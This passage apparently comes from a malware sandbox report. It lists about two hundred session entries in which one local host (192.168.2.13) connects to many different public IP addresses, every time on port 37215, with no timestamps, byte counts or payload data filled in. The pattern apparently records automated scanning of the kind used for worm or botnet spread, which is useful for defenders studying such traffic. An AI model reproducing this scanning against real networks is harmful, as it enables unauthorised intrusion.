                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5593192.168.2.1351722157.223.116.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5594192.168.2.1341912157.87.82.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5595192.168.2.134343859.11.38.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5596192.168.2.1335962157.178.55.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5597192.168.2.134903241.12.216.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5598192.168.2.1358216197.142.149.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5599192.168.2.135422241.46.164.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5600192.168.2.1358256197.241.46.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5601192.168.2.134947638.116.119.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5602192.168.2.1357144197.177.218.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5603192.168.2.1357726197.179.103.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5604192.168.2.1341974134.57.233.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5605192.168.2.1351106197.142.93.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5606192.168.2.1350076197.34.233.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5607192.168.2.133458841.44.47.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5608192.168.2.1339488197.253.97.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5609192.168.2.135266282.217.128.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5610192.168.2.1339348157.73.10.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5611192.168.2.1348842157.252.30.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5612192.168.2.135869897.35.224.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5613192.168.2.1359220157.59.102.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5614192.168.2.13343825.74.71.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5615192.168.2.1354088164.3.108.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5616192.168.2.1336494181.70.143.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5617192.168.2.1334814197.115.38.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5618192.168.2.1351354157.248.186.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5619192.168.2.1343832197.84.230.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5620192.168.2.1341508157.127.202.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5621192.168.2.1357400157.241.117.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5622192.168.2.1338366197.202.38.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5623192.168.2.1348302179.143.173.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5624192.168.2.1359142197.6.129.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5625192.168.2.1347346157.19.66.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5626192.168.2.135529623.88.61.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5627192.168.2.134637041.169.85.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5628192.168.2.133302041.61.86.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5629192.168.2.134564441.24.97.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5630192.168.2.1353776157.155.59.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5631192.168.2.1359054197.29.241.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5632192.168.2.1350080197.146.226.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5633192.168.2.13609268.85.140.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5634192.168.2.1336734197.234.217.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5635192.168.2.1340436221.94.89.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5636192.168.2.135531841.202.51.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5637192.168.2.1358866157.30.57.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5638192.168.2.135366641.212.108.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5639192.168.2.134402260.148.234.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5640192.168.2.1348936191.108.142.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5641192.168.2.134295241.6.202.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5642192.168.2.1337516136.69.12.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5643192.168.2.1349214197.1.220.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5644192.168.2.135766041.61.62.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5645192.168.2.1353066197.20.121.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5646192.168.2.135706499.4.25.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5647192.168.2.1342220177.67.44.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5648192.168.2.1336256197.252.253.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5649192.168.2.1336056197.244.228.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5650192.168.2.1333902164.41.149.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5651192.168.2.134444641.48.92.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5652192.168.2.1345882197.253.87.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5653192.168.2.1359004197.190.6.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5654192.168.2.1354278157.76.0.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5655192.168.2.1336112197.247.27.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5656192.168.2.134069899.244.21.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5657192.168.2.1342004118.168.148.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5658192.168.2.1348550197.196.174.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5659192.168.2.1349562197.149.103.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5660192.168.2.1343378157.231.223.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5661192.168.2.134836063.50.53.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5662192.168.2.135853041.119.166.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5663192.168.2.1350378197.84.8.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5664192.168.2.135919041.13.49.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5665192.168.2.1349356212.118.143.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5666192.168.2.136067841.161.33.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5667192.168.2.1354424108.28.209.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5668192.168.2.1347030197.169.226.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5669192.168.2.1344918156.2.92.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5670192.168.2.1350272157.79.55.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5671192.168.2.1346252157.237.62.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5672192.168.2.135064041.34.198.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5673192.168.2.135199841.43.63.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5674192.168.2.1355942197.164.196.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5675192.168.2.1337558161.204.119.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5676192.168.2.1360610157.113.203.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5677192.168.2.1350628197.112.109.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5678192.168.2.1345942157.202.40.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5679192.168.2.134065241.152.176.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5680192.168.2.136050461.31.71.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5681192.168.2.1342954157.138.220.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5682192.168.2.1343878147.201.114.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5683192.168.2.1346850157.69.29.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5684192.168.2.1339682197.154.189.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5685192.168.2.1341872157.0.251.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5686192.168.2.1339132157.107.133.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5687192.168.2.1341304157.18.186.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5688192.168.2.1349954208.211.22.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5689192.168.2.1349602197.132.126.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5690192.168.2.1359542157.218.142.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5691192.168.2.1343304197.143.67.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5692192.168.2.1355232200.238.109.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5693192.168.2.1356194212.119.84.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5694192.168.2.133865241.219.95.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5695192.168.2.1342864157.170.213.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5696192.168.2.1352312157.116.74.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5697192.168.2.1358030157.217.235.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5698192.168.2.1333378192.51.221.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5699192.168.2.135139641.38.206.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5700192.168.2.1339128157.166.137.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5701192.168.2.1342044197.238.101.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5702192.168.2.1334296157.120.241.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5703192.168.2.1335908197.184.85.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5704192.168.2.1338160157.247.121.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5705192.168.2.1358576138.141.95.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5706192.168.2.134723041.131.251.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5707192.168.2.1358434185.89.46.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5708192.168.2.135427641.53.123.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5709192.168.2.1335484197.64.37.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5710192.168.2.1344904122.25.23.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5711192.168.2.135588441.201.80.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5712192.168.2.1340908197.114.241.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5713192.168.2.1352722188.58.170.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5714192.168.2.1343122123.232.248.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5715192.168.2.135777041.65.131.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5716192.168.2.1338378197.163.224.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5717192.168.2.1357026157.245.68.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5718192.168.2.1334266197.253.56.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5719192.168.2.1345280197.41.237.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5720192.168.2.1351508157.97.154.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5721192.168.2.1359772157.155.6.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5722192.168.2.1336644157.154.165.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5723192.168.2.1352950197.151.133.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5724192.168.2.1360608220.108.78.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5725192.168.2.1337680157.60.117.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5726192.168.2.1342290197.211.100.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5727192.168.2.1348822157.93.173.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5728192.168.2.1346424157.104.34.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5729192.168.2.1346152157.113.183.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5730192.168.2.1360408157.179.88.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5731192.168.2.1359910157.198.187.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5732192.168.2.1347354197.67.41.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5733192.168.2.1358694197.245.105.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5734192.168.2.1332932157.116.241.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5735192.168.2.1349690197.133.226.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5736192.168.2.134048241.107.249.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5737192.168.2.1343656197.247.129.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5738192.168.2.135763862.206.102.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5739192.168.2.1334428193.154.82.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5740192.168.2.1355176157.110.121.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5741192.168.2.135957841.207.215.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5742192.168.2.136037241.139.246.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5743192.168.2.133904641.73.24.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5744192.168.2.1357046197.168.126.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5745192.168.2.135236241.144.211.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5746192.168.2.1351150197.187.18.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5747192.168.2.1336810157.13.130.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5748192.168.2.134981041.224.143.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5749192.168.2.1347662217.95.241.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5750192.168.2.1352976157.35.155.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5751192.168.2.1341726197.110.52.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5752192.168.2.1354668197.187.33.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5753192.168.2.1350948206.116.1.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5754192.168.2.1360244203.198.21.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5755192.168.2.1339942152.71.83.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5756192.168.2.134178041.198.138.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5757192.168.2.135574041.247.165.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5758192.168.2.1342806157.36.195.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5759192.168.2.134190241.31.141.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5760192.168.2.134800276.197.154.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5761192.168.2.134687841.179.196.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5762192.168.2.1342446157.237.252.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5763192.168.2.1358572197.70.47.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5764192.168.2.134003023.25.7.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5765192.168.2.1351564157.131.224.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5766192.168.2.1344560162.4.172.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5767192.168.2.135450841.97.193.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5768192.168.2.1348714197.175.109.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5769192.168.2.1356996197.17.189.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5770192.168.2.1356236157.93.2.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5771192.168.2.133669888.31.183.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5772192.168.2.1357906157.82.62.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5773192.168.2.135799041.173.109.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5774192.168.2.134175441.65.157.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5775192.168.2.1334116197.145.217.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5776192.168.2.1336976157.51.78.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5777192.168.2.13348882.244.119.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5778192.168.2.1335282197.82.220.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5779192.168.2.1342820157.81.140.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5780192.168.2.1357964197.16.247.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5781192.168.2.1355396157.245.223.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5782192.168.2.135617841.16.45.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5783192.168.2.1348842120.246.159.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5784192.168.2.133586041.240.107.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5785192.168.2.1342256157.233.64.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5786192.168.2.135574041.158.171.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5787192.168.2.1334892197.249.230.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5788192.168.2.135101241.199.116.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5789192.168.2.1359686197.204.217.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5790192.168.2.133435041.99.4.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5791192.168.2.1347322197.32.119.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5792192.168.2.1338322197.182.180.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5793192.168.2.1358788157.89.46.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5794192.168.2.1356992197.99.97.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5795192.168.2.135881877.219.123.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5796192.168.2.1342912162.40.130.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5797192.168.2.1347028157.167.228.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5798192.168.2.134805417.29.160.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5799192.168.2.135717441.105.130.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5800192.168.2.1337562157.198.235.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5801192.168.2.1352580197.135.24.5537215
                                                  TimestampBytes transferredDirectionData


